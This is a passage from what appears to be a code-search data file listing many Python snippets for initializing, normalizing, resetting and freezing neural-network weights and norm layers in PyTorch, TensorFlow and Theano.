self.leaf_modules:\n if (m.__class__ in [nn.Linear, nn.Conv1d, nn.Conv2d, nn.Conv3d, nn.ConvTranspose2d, nn.ConvTranspose3d]):\n cur_weighted = m\n if (m.__class__ in [nn.RNN, nn.GRU, nn.LSTM]):\n cur_weighted = m\n if ('Norm' in str(m.__class__)):\n if (cur_weighted is not None):\n self.norm_modules.append((m, cur_weighted))", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n self.layer.v, axis=self.norm_axes) * self.layer.g", "def _compute_weights(self):\n with variable_scope.variable_scope('compute_weights'):\n self.layer.W = nn_impl.l2_normalize(\n self.layer.v, axis=self.norm_axes) * self.layer.g", "def _init_weights(self):\n for m in self.modules():\n if type(m) in {\n nn.Linear,\n nn.Conv3d,\n nn.Conv2d,\n nn.ConvTranspose2d,\n nn.ConvTranspose3d\n }:\n nn.init.kaiming_normal_(\n m.weight.data, a=0, mode='fan_out', nonlinearity='relu',\n )\n if m.bias is not None:\n fan_in, fan_out = \\\n nn.init._calculate_fan_in_and_fan_out(m.weight.data)\n bound = 1 / math.sqrt(fan_out)\n nn.init.normal_(m.bias, -bound, bound)", "def normalize_weights(self):\n total_weight = sum(self.weights)\n self.norm_weights = self.weights / float(total_weight)", "def _initialize_weights(self):\r\n for m in self.modules():\r\n if isinstance(m, nn.Conv2d):\r\n m.weight.data.normal_(0, 0.05)\r\n if m.bias is not None:\r\n m.bias.data.zero_()", "def initialize_weights(self):\n for layer in self._cnn_layers:\n weights_initializer.WeightsInitializer.initialize_layer_or_model(layer)", "def init_weights(self):\n # We don't use the `init_weights()` function in BaseModule, since it\n # doesn't support the initialization method from `reset_parameters()`\n # in Pytorch.\n if self.with_backbone:\n self.backbone.init_weights()\n\n if self.with_neck:\n for m in self.neck.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()\n\n if self.with_head:\n for m in self.head.modules():\n if isinstance(m, _ConvNd) or isinstance(m, _BatchNorm):\n m.reset_parameters()", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.ConvTranspose2d):\n xavier_uniform_(m.weight)\n if m.bias is not None:\n zeros_(m.bias)", "def normalize_weights(self):\n \n # Set negative weights to zero\n # Normalize to sum to one.\n \n\n\n self.new_weight=[]\n for i in self._weights:\n if any(i < 0 for i in self._weights):\n self.new_weight = [0,1]\n\n elif all(i == 0 for i in self._weights):\n i = 1/len(self._weights)\n self.new_weight.append(i)\n else:\n i = i/sum(self._weights)\n self.new_weight.append(i)\n\n # If the weights are all zeros, set weights equal to 1/k, where k is the number\n # of components.\n self._weights = self.new_weight\n self._weights = np.round(self._weights,3)", "def normalizeWeights(self):\n for wt in self.weights:\n wt[wt>1] = 1\n wt[wt<-1] = -1\n for bs in self.bias:\n bs[bs>1] = 1\n bs[bs<-1] = -1", "def _reset_weights(m):\n\n nn = import_optional_dependency(\"torch.nn\")\n init = import_optional_dependency(\"torch.nn.init\")\n if isinstance(m, nn.Conv1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.Conv3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose1d):\n init.normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose2d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.ConvTranspose3d):\n init.xavier_normal_(m.weight.data)\n if m.bias is not None:\n init.normal_(m.bias.data)\n elif isinstance(m, nn.BatchNorm1d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm2d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.BatchNorm3d):\n init.normal_(m.weight.data, mean=1, std=0.02)\n init.constant_(m.bias.data, 0)\n elif isinstance(m, nn.Linear):\n init.xavier_normal_(m.weight.data)\n init.normal_(m.bias.data)\n elif isinstance(m, nn.LSTM):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.LSTMCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRU):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)\n elif isinstance(m, nn.GRUCell):\n for param in m.parameters():\n if len(param.shape) >= 2:\n init.orthogonal_(param.data)\n else:\n init.normal_(param.data)", "def remove_norms(module_: \"WN\") -> \"WN\":\n module_.start = torch.nn.utils.remove_weight_norm(module_.start_conv)\n module_.cond_layer = torch.nn.utils.remove_weight_norm(module_.cond_layer)\n for i, layer_ in enumerate(module_.in_layers):\n layer_ = DepthwiseSeparableConv1d.remove_batch_norm(layer_)\n module_.in_layers[i] = layer_\n for i, layer_ in enumerate(module_.res_skip_layers):\n layer_ = torch.nn.utils.remove_weight_norm(layer_)\n module_.res_skip_layers[i] = layer_\n return module_", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.ent_proj_vects.data = normalize(self.ent_proj_vects.data, p=2, dim=1)\n self.rel_proj_vects.data = normalize(self.rel_proj_vects.data, p=2, dim=1)", "def _weight_initializer(self):\n for m in self.modules():\n if isinstance(m, nn.ConvTranspose2d):\n nn.init.kaiming_normal_(m.weight)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1.0)\n nn.init.constant_(m.bias, 0.0)", "def init_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n xavier_init(m)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=2, dim=1)\n self.relation_embeddings.weight.data = normalize(self.relation_embeddings.weight.data,\n p=2, dim=1)\n self.projection_matrices.data = normalize(self.projection_matrices.data, p=2, dim=2)", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)", "def init_weights(self, clz):\n for ch in self.children():\n if issubclass(ch.__class__, nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: clz._init_weights(self.lrm, module))", "def normalize_parameters(self):\n self.entity_embeddings.weight.data = normalize(self.entity_embeddings.weight.data,\n p=self.norm_type, dim=1)\n self.normal_vectors.data = normalize(self.normal_vectors, p=2, dim=1)", "def remove_weight_norm_(self):\n\n def _remove_weight_norm(m):\n try:\n torch.nn.utils.remove_weight_norm(m)\n except ValueError:\n return\n\n self.apply(_remove_weight_norm)", "def init_weight(self):\n init_layer(self.conv1)\n init_layer(self.conv2)\n init_bn(self.norm1)\n init_bn(self.norm2)", "def normalize(self, weights):\n tot = sum(weights)\n newW = [-1] * self.numParticles\n for i in range(len(weights)):\n newW[i] = weights[i] / tot\n return newW", "def layer_normalize_(self, ref_point: 'ModelParameters', order=2):\n # in-place normalize each parameter\n for layer_idx, parameter in enumerate(self.parameters, 0):\n parameter *= (ref_point.layer_norm(layer_idx, order) / self.layer_norm(layer_idx, order))", "def init_weights(self):\n\n for ch in self.children():\n if issubclass(ch.__class__, torch.nn.Module) and not issubclass(ch.__class__, PreTrainedModel):\n ch.apply(lambda module: self.transformer.__class__._init_weights(self.transformer, module))", "def init_weights(layer):\r\n layer_name = layer.__class__.__name__\r\n if layer_name.find(\"Conv\") != -1:\r\n layer.weight.data.normal_(0.0, 0.02)\r\n elif layer_name.find(\"BatchNorm\") != -1:\r\n layer.weight.data.normal_(1.0, 0.02)\r\n layer.bias.data.fill_(0)", "def _rescale_module(module):\n for sub in module.modules():\n if isinstance(sub, (nn.Conv1d, nn.ConvTranspose1d, nn.Conv2d, nn.ConvTranspose2d)):\n std = sub.weight.std().detach()\n scale = (std / 0.1) ** 0.5\n sub.weight.data /= scale\n if sub.bias is not None:\n sub.bias.data /= scale", "def init_weights(layer):\n layer_name = layer.__class__.__name__\n if layer_name.find(\"Conv\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(0.0, 0.02)\n elif layer_name.find(\"BatchNorm\") != -1 and hasattr(layer, 'weight'):\n layer.weight.data.normal_(1.0, 0.02)\n layer.bias.data.fill_(0)", "def _compute_weights(self):\n with tf.name_scope('compute_weights'):\n self.layer.kernel = tf.nn.l2_normalize(\n self.v, axis=self.kernel_norm_axes) * self.g", "def apply_on_layer(self, layer):\n init_g = Constant(1.)\n\n try:\n weight_tag = 'W' if hasattr(layer, 'W') else 'U'\n except AttributeError:\n raise AttributeError(\"Trying to call weight norm on {} \".format(layer)+\\\n \"without layer.W or layer.U defined\")\n weights = getattr(layer, weight_tag)\n\n Wndim = weights.get_value().ndim\n if Wndim == 4:\n W_axes_to_sum = (1,2,3)\n W_dimshuffle_args = (0,'x','x','x')\n elif Wndim == 5:\n W_axes_to_sum = (1,2,3,4)\n W_dimshuffle_args = (0,'x','x','x','x')\n elif Wndim == 3 :\n raise NotImplementedError(\"What is a weight with 3 dimensions?\")\n else :\n W_axes_to_sum = 0\n W_dimshuffle_args = ('x',0)\n\n if self.train_g is not None:\n g = init_g(layer.output_dims)\n g = theano.shared(g, name=layer.prefix+'_g')\n if self.train_g :\n layer.params += [g]\n\n new_weights = weights * (\n g / T.sqrt(1e-6 + T.sum(T.square(weights),\n axis=W_axes_to_sum))).dimshuffle(*W_dimshuffle_args)\n layer.g = g\n else:\n new_weights = weights / \\\n T.sqrt(1e-6 + T.sum(T.square(weights),\n axis=W_axes_to_sum,keepdims=True))\n\n setattr(layer, weight_tag, new_weights)", "def init_weights(self):\n for m in self.cls_convs:\n normal_init(m.conv, std=0.01)\n for m in self.reg_convs:\n normal_init(m.conv, std=0.01)\n bias_cls = bias_init_with_prob(0.01)\n normal_init(self.retina_cls, std=0.01, bias=bias_cls)\n normal_init(self.retina_reg, std=0.01)", "def normalize_weights(w, dims=(0,), bias=1e-5):\n with tf.name_scope('normalization'):\n return w / (tf.sqrt(tf.reduce_sum(tf.square(w), dims, keep_dims=True) + bias))", "def remove_weight_norm(self):\n\n def _remove_weight_norm(m):\n try:\n logging.debug(f\"Weight norm is removed from {m}.\")\n torch.nn.utils.remove_weight_norm(m)\n except ValueError: # this module didn't have weight norm\n return\n\n self.apply(_remove_weight_norm)", "def remove_weight_norm(self):\n\n def _remove_weight_norm(m):\n try:\n logging.debug(f\"Weight norm is removed from {m}.\")\n torch.nn.utils.remove_weight_norm(m)\n except ValueError: # this module didn't have weight norm\n return\n\n self.apply(_remove_weight_norm)", "def init_weights(self):\n for m in self.cls_convs:\n normal_init(m.conv, std=0.01)\n for m in self.reg_convs:\n normal_init(m.conv, std=0.01)\n normal_init(self.atss_reg, std=0.01)\n normal_init(self.atss_iou, std=0.01)\n bias_cls = bias_init_with_prob(0.01)\n normal_init(self.atss_cls, std=0.01, bias=bias_cls)", "def layer_norm(input, normalized_shape, weight, bias, eps=1e-5):\n return FunctionLib.apply(\n 'LayerNorm', input.device, [input, weight, bias],\n axis=input.ndimension() - len(normalized_shape), epsilon=eps)", "def init_weights(model, fc_init_std=0.01):\n for m in model.modules():\n if isinstance(m, nn.Conv3d):\n \"\"\"\n Follow the initialization method proposed in:\n {He, Kaiming, et al.\n \"Delving deep into rectifiers: Surpassing human-level\n performance on imagenet classification.\"\n arXiv preprint arXiv:1502.01852 (2015)}\n \"\"\"\n c2_msra_fill(m, nonlinearity=('relu', 'leaky_relu')[0])\n # c2_xavier_fill(m)\n # nn.init.xavier_normal_(m.weight)\n # nn.init.xavier_uniform_(m.weight)\n # if m.bias is not None: # pyre-ignore\n # nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm3d) or isinstance(m, nn.InstanceNorm3d):\n m.weight.data.fill_(1.0)\n m.bias.data.zero_()\n if isinstance(m, nn.Linear): # This assumes nn.Linear is the final layers\n # TODO check to see if this is effective in this architecture since the final is a conv3d\n m.weight.data.normal_(mean=0.0, std=fc_init_std)\n m.bias.data.zero_()", "def normalize_weights(self, w):\n n = w.astype(np.float64, copy=True)\n c = float(np.sum(w))\n n /= c\n return n", "def forward(self, x, mask):\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)", "def _setWeights(self):\r\n for layer in self.layer_names:\r\n raw_w = getattr(self, f'{layer}_raw')\r\n self.module._parameters[layer] = F.dropout(raw_w, p=self.weight_pro, training=self.training)", "def remove_norms(self):\n dev = next(self.parameters()).device\n for name, module in self.named_modules():\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_spectral_norm(module, name='weight_hh_l0_reverse')\n print(\"Removed spectral norm from {}\".format(name))\n except:\n pass\n try:\n nn.utils.remove_weight_norm(module)\n print(\"Removed wnorm from {}\".format(name))\n except:\n pass\n self.to(device=dev)", "def train(self, mode=True, freeze_bn=False):\n super(WideResNet, self).train(mode)\n self.freeze_bn = freeze_bn\n if self.freeze_bn:\n print(\"Freezing Mean/Var of BatchNorm2D.\")\n print(\"Freezing Weight/Bias of BatchNorm2D.\")\n if self.freeze_bn:\n for m in self.modules():\n if isinstance(m, nn.BatchNorm2d):\n m.eval()\n m.weight.requires_grad = False\n m.bias.requires_grad = False", "def forward(self, x, mask):\n \"Pass the input (and mask) through each layer in turn\"\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)", "def weight_norm(module, name=\"weight\", dim=0):\n WeightNorm.apply(module, name, dim)\n return module", "def _init_weights(self):\n nn.init.xavier_normal_(self.out.weight)", "def normalize(self):\n norm_val = self.sum2/self.sum1\n self.sum1=0\n\n for sentence in self.data_set:\n sentence.weight *= norm_val\n self.sum1 += sentence.weight", "def init_weights(net):\n for m in net.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_uniform_(m.weight)\n # nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)\n\n return net", "def filter_normalize_(self, ref_point: 'ModelParameters', order=2):\n for l in range(len(self.parameters)):\n # normalize one-dimensional bias vectors\n if len(self.parameters[l].size()) == 1:\n self.parameters[l] *= (ref_point.parameters[l].norm(order) / self.parameters[l].norm(order))\n # normalize two-dimensional weight vectors\n for f in range(len(self.parameters[l])):\n self.parameters[l][f] *= ref_point.filter_norm((l, f), order) / (self.filter_norm((l, f), order))", "def update_weights(self):\n\n self.weights -= self.loss_grads\n self.loss_grads = np.zeros(self.weights.shape)", "def initialize(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_normal_(m.weight)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)", "def init_weights(self, module):\n if isinstance(module, (torch.nn.Linear, torch.nn.Embedding, torch.nn.LayerNorm)):\n module.weight.data.normal_(mean=0.0, std=self.initializer_range)\n if isinstance(module, (torch.nn.Linear, torch.nn.LayerNorm)) and module.bias is not None:\n module.bias.data.zero_()", "def reset_all_weights(model: nn.Module) -> None:\n\n @torch.no_grad()\n def weight_reset(m: nn.Module):\n # - check if the current module has reset_parameters & if it's callabed called it on m\n reset_parameters = getattr(m, \"reset_parameters\", None)\n if callable(reset_parameters):\n m.reset_parameters()\n\n # Applies fn recursively to every submodule see: https://pytorch.org/docs/stable/generated/torch.nn.Module.html\n model.apply(fn=weight_reset)", "def update_layers(self):\n\n # Para cada layer atualiza utilizando o gradiente descendente e o learning rate\n for layer in self.layers:\n layer.update_layer(self.learning_rate)", "def weights_init(mod):\n classname = mod.__class__.__name__\n if classname.find('Conv') != -1:\n mod.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n mod.weight.data.normal_(1.0, 0.02)\n mod.bias.data.fill_(0)", "def init_weights(self):\n\n params = torch.load(self.resnet_weight)\n\n self.fc1.weight.data = params['state_dict']['module.fc.weight'].clone()\n self.fc1.bias.data = params['state_dict']['module.fc.bias'].clone()\n\n\n r = np.sqrt(1.) / np.sqrt(self.fc3.in_features +\n self.fc3.out_features)\n self.fc3.weight.data.uniform_(-r, r)\n self.fc3.bias.data.fill_(0)\n r = np.sqrt(1.) / np.sqrt(self.fc2.in_features +\n self.fc2.out_features)\n self.fc2.weight.data.uniform_(-r, r)\n self.fc2.bias.data.fill_(0)\n r = np.sqrt(1.) / np.sqrt(self.fc4.in_features +\n self.fc4.out_features)\n self.fc4.weight.data.uniform_(-r, r)\n self.fc4.bias.data.fill_(0)", "def spectral_norm_parallel(self):\n weights = {}\n for l in self.all_conv_layers:\n weight = l.weight_normalized\n weight_mat = weight.view(weight.size(0), -1)\n if weight_mat.shape not in weights:\n weights[weight_mat.shape] = []\n weights[weight_mat.shape].append(weight_mat)\n loss = 0\n for i in weights:\n weights[i] = torch.stack(weights[i], dim=0)\n with torch.no_grad():\n num_iter = self.num_power_iter\n if i not in self.sr_u:\n num_w, row, col = weights[i].shape\n self.sr_u[i] = F.normalize(torch.ones(num_w, row).normal_(0, 1), dim=1, eps=0.001)\n self.sr_v[i] = F.normalize(torch.ones(num_w, col).normal_(0, 1), dim=1, eps=0.001)\n num_iter = 10 * self.num_power_iter\n for j in range(num_iter):\n self.sr_v[i] = F.normalize(torch.matmul(self.sr_u[i].unsqueeze(1), weights[i]).squeeze(1), dim=1, eps=0.001)\n self.sr_u[i] = F.normalize(torch.matmul(weights[i], self.sr_v[i].unsqueeze(2)).squeeze(2), dim=1, eps=0.001)\n sigma = torch.matmul(self.sr_u[i].unsqueeze(1), torch.matmul(weights[i], self.sr_v[i].unsqueeze(2)))\n loss += torch.sum(sigma)\n return loss", "def normalize_weight(self, Z):\n self.weight /= Z", "def init_weights(self):\n for i in range(5):\n default_init_weights(getattr(self, f'conv{i+1}'), 0.1)", "def initialize_weights(self):\n weights_initializer.WeightsInitializer.initialize_layer_or_model(\n self._batch)", "def update_weights(self):\n activation, activation_p = self.feedforward()\n # initialize delta_weights\n delta_w = np.zeros(2)\n # simultaneous calculate delta_weights\n for i, element in enumerate(self.y):\n delta_w += (activation[i]-element)*(activation_p[i])*self.X[i]\n # update weight\n self.weights -= self.alfa*delta_w", "def normalise(self):\n total = 0\n for feat_set in self.values():\n for value in feat_set.values():\n total += value\n norm = 1/total\n for feat_set in self.values():\n for feat in feat_set:\n feat_set[feat] *= norm\n return self", "def _init_norm(self, weights):\n from tensorflow.python.ops.linalg_ops import norm\n with variable_scope.variable_scope('init_norm'):\n flat = array_ops.reshape(weights, [-1, self.layer_depth])\n return array_ops.reshape(norm(flat, axis=0), (self.layer_depth,))", "def _init_norm(self, weights):\n from tensorflow.python.ops.linalg_ops import norm\n with variable_scope.variable_scope('init_norm'):\n flat = array_ops.reshape(weights, [-1, self.layer_depth])\n return array_ops.reshape(norm(flat, axis=0), (self.layer_depth,))", "def initialize_weights(self):\n tf.nest.map_structure(\n weights_initializer.WeightsInitializer.initialize_layer_or_model,\n self._layer_nest)", "def init_weights(m):\n if isinstance(m, nn.Conv2d):\n # Note that there is no bias due to BN\n fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(mean=0.0, std=math.sqrt(2.0 / fan_out))\n elif isinstance(m, nn.BatchNorm2d):\n zero_init_gamma = cfg.BN.ZERO_INIT_FINAL_GAMMA\n zero_init_gamma = hasattr(m, \"final_bn\") and m.final_bn and zero_init_gamma\n m.weight.data.fill_(0.0 if zero_init_gamma else 1.0)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(mean=0.0, std=0.01)\n m.bias.data.zero_()", "def normalise(self):\n s = self._sum()\n if s != 0:\n for element, value in self.focals.items():\n self.focals[element] /= s", "def weights_init(m):\n if (\n isinstance(m, nn.Linear)\n or isinstance(m, nn.EmbeddingBag)\n or isinstance(m, nn.Embedding)\n or isinstance(m, SparseLinear)\n ):\n nn.init.xavier_normal_(m.weight)", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def reset_model(model):\n\n\tfor layer in model.layers:\n\t\t# Note: these are custom depending on the layer type\n\t\tif '.MoleculeConv' in str(layer):\n\t\t\tW_inner = layer.init_inner((layer.inner_dim, layer.inner_dim))\n\t\t\tb_inner = np.zeros((1, layer.inner_dim))\n\t\t\t# Inner weights\n\t\t\tlayer.W_inner.set_value((T.tile(W_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, layer.inner_dim, layer.inner_dim)).eval()).astype(np.float32))\n\t\t\tlayer.b_inner.set_value((T.tile(b_inner, (layer.depth + 1, 1, 1)).eval() + \\\n\t\t\t\tinitializations.uniform((layer.depth + 1, 1, layer.inner_dim)).eval()).astype(np.float32))\n\n\t\t\t# Outer weights\n\t\t\tW_output = layer.init_output((layer.inner_dim, layer.units), scale = layer.scale_output)\n\t\t\tb_output = np.zeros((1, layer.units))\n\t\t\t# Initialize weights tensor\n\t\t\tlayer.W_output.set_value((T.tile(W_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlayer.b_output.set_value((T.tile(b_output, (layer.depth + 1, 1, 1)).eval()).astype(np.float32))\n\t\t\tlogging.info('graphFP layer reset')\n\n\t\telif '.Dense' in str(layer):\n\t\t\tlayer.W.set_value((layer.init(layer.W.shape.eval()).eval()).astype(np.float32))\n\t\t\tlayer.b.set_value(np.zeros(layer.b.shape.eval(), dtype=np.float32))\n\t\t\tlogging.info('dense layer reset')\n\n\t\telif '.Dropout' in str(layer):\n\t\t\tlogging.info('dropout unchanged')\n\t\telse:\n\t\t\traise ValueError('Unknown layer {}, cannot reset weights'.format(str(layer)))\n\tlogging.info('Reset model weights')\n\treturn model", "def init_weights(self) -> None:\n nn.init.kaiming_normal_(self._U)\n nn.init.kaiming_normal_(self._W)\n nn.init.kaiming_normal_(self._V)\n\n nn.init.normal_(self._b)", "def init_weights(m):\n if isinstance(m, nn.Conv2d):\n # Note that there is no bias due to BN\n fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(mean=0.0, std=np.sqrt(2.0 / fan_out))\n elif isinstance(m, nn.BatchNorm2d):\n zero_init_gamma = cfg.BN.ZERO_INIT_FINAL_GAMMA\n zero_init_gamma = hasattr(m, \"final_bn\") and m.final_bn and zero_init_gamma\n m.weight.data.fill_(0.0 if zero_init_gamma else 1.0)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(mean=0.0, std=0.01)\n m.bias.data.zero_()", "def normalization(channels):\n return GroupNorm32(32, channels)", "def forward_propagate(self):\n for i in range(0, len(self.output_layer)):\n output = 0\n\n # Loop through each Neuron in the hidden layer\n for neuron in self.hidden_layer:\n output += neuron.weights[i] * neuron.output\n\n # Update summation for output classifier\n self.output_layer[i] = output", "def weights_init_normal(m):\r\n if isinstance(m, nn.Conv2d):\r\n m.weight.data.normal_(0.0, 0.02)\r\n elif isinstance(m, nn.BatchNorm2d):\r\n m.weight.data.normal_(1.0, 0.02)\r\n m.bias.data.fill_(0)", "def model_normalize_(self, ref_point: 'ModelParameters', order=2):\n for parameter in self.parameters:\n parameter *= (ref_point.model_norm(order) / self.model_norm())", "def weights_init(m):\n if(type(m) == nn.ConvTranspose2d or type(m) == nn.Conv2d):\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif(type(m) == nn.BatchNorm2d):\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)", "def weights_init(m):\n if(type(m) == nn.ConvTranspose2d or type(m) == nn.Conv2d):\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n elif(type(m) == nn.BatchNorm2d):\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0)", "def apply_weights(self):\n return self.X.dot(self.get_weights())", "def extract_weights(self, name):\n\n # Extract weights\n weight_layer = (self.merged_model).get_layer(name)\n weights = weight_layer.get_weights()[0]\n\n # Normalize\n # weights = weights / np.linalg.norm(weights, axis = 1).reshape((-1, 1))\n return weights", "def normalize_all(self):\n #for i, vector in enumerate(self.real_vectors):\n # self.real_vectors[i] /= np.linalg.norm(vector)\n self.vectors /= np.linalg.norm(self.vectors, axis=1).reshape(-1,1)\n for i, vector in enumerate(self.real_vectors):\n vector.set(self.vectors[i])", "def normalize_weights(self, labels, weights):\n if self._ragged:\n labels, _, weights, _ = utils.ragged_to_dense(labels, None, weights)\n return self._normalize_weights_impl(labels, weights)", "def normalizeWeights(self):\n\n\t\t# Normalizing crossover and mutation handler weights, result is a CDF\n\t\ttotal = sum(self.mutation_handlers_weights)\n\t\tcumsum = 0\n\t\tfor i in range(len(self.mutation_handlers_weights)):\n\t\t\tcumsum += self.mutation_handlers_weights[i]\n\t\t\tself.mutation_handlers_weights[i] = cumsum/total\n\t\ttotal = sum(self.crossover_handlers_weights)\n\t\tcumsum = 0\n\t\tfor i in range(len(self.crossover_handlers_weights)):\n\t\t\tcumsum += self.crossover_handlers_weights[i]\n\t\t\tself.crossover_handlers_weights[i] = cumsum/total", "def update_network(self, a, batch_size):\n for layer in self.layers:\n layer.weights_update(a, self.alpha, self.l2_lambda, batch_size)\n a = layer.a", "def init_weights(self):\n # Initialize weights\n self.apply(self._init_weights)", "def remove_norms(model: \"SqueezeWave\") -> \"SqueezeWave\":\n squeeze_wave = model\n for i, wn_layer in enumerate(squeeze_wave.wn_layers):\n squeeze_wave.wn_layers[i] = WN.remove_norms(wn_layer)\n return squeeze_wave", "def apply_batch_normalization(self, layer):\n if type(layer) is not BatchNormalization:\n raise ValueError('The `layer` must be neoml.Dnn.BatchNormalization.')\n\n self._internal.apply_batch_normalization(layer._internal)", "def normalize(w: torch.Tensor):\n\n if w.dim() > 1:\n return _matrix(w)\n\n return _vector(w)", "def init_weights(self, leveledinit: bool, kernel_size: int, bias: bool) -> None:\n if leveledinit:\n nn.init.normal_(self.conv1d.weight, std=1e-3)\n nn.init.normal_(self.conv1d.bias, std=1e-6)\n with torch.no_grad():\n self.conv1d.weight[:, 0, :] += 1.0 / kernel_size\n else:\n nn.init.xavier_uniform_(self.conv1d.weight)\n\n if self.embed in (\"pre\", \"post\"):\n nn.init.xavier_uniform_(self.embedding.weight)", "def normalize_layer(tensor, name, norm_use='bn'):\n if norm_use == \"gn\":\n x = GroupNorm(name=name + 'gn', groups=32)(tensor)\n elif norm_use == \"bn\":\n x = tf.keras.layers.BatchNormalization(axis=-1, name=name + 'bn', epsilon=1.001e-5)(tensor)\n elif norm_use == \"rbn\":\n x = tf.keras.layers.BatchNormalization(axis=-1, name=name + 'rbn', epsilon=1.001e-5, renorm=True)(tensor)\n elif norm_use == \"in\":\n x = InstanceNormalization(axis=-1, name=name + 'in')(tensor)\n else:\n x = tensor\n return x", "def _initialize_weights(self):\n for _, cell in self.cells_and_names():\n if isinstance(cell, nn.Conv2d):\n cell.weight.set_data(orthogonal(cell.weight.shape, 0.6))\n if cell.bias is not None:\n cell.bias.set_data(\n init.initializer(init.Constant(0.01), cell.bias.shape,\n cell.bias.dtype))", "def reset_weights(self):\n self.policy_backbone.reset_weights()\n self.value_backbone.reset_weights()\n self.action_head.reset_weights()\n self.critic_head.reset_weights()", "def init_weights(m: Union[torch.nn.Conv3d, torch.nn.BatchNorm3d]) -> None:\n import torch\n if isinstance(m, torch.nn.Conv3d):\n torch.nn.init.normal_(m.weight, 0, 0.01)\n elif isinstance(m, torch.nn.BatchNorm3d):\n torch.nn.init.constant_(m.weight, 1)\n torch.nn.init.constant_(m.bias, 0)", "def _init_layers(self) -> None:\n self.self_attn = MultiheadAttention(**self.self_attn_cfg)\n self.cross_attn = MultiheadAttention(**self.cross_attn_cfg)\n self.embed_dims = self.self_attn.embed_dims\n self.ffn = FFN(**self.ffn_cfg)\n norms_list = [\n build_norm_layer(self.norm_cfg, self.embed_dims)[1]\n for _ in range(3)\n ]\n self.norms = ModuleList(norms_list)" ]
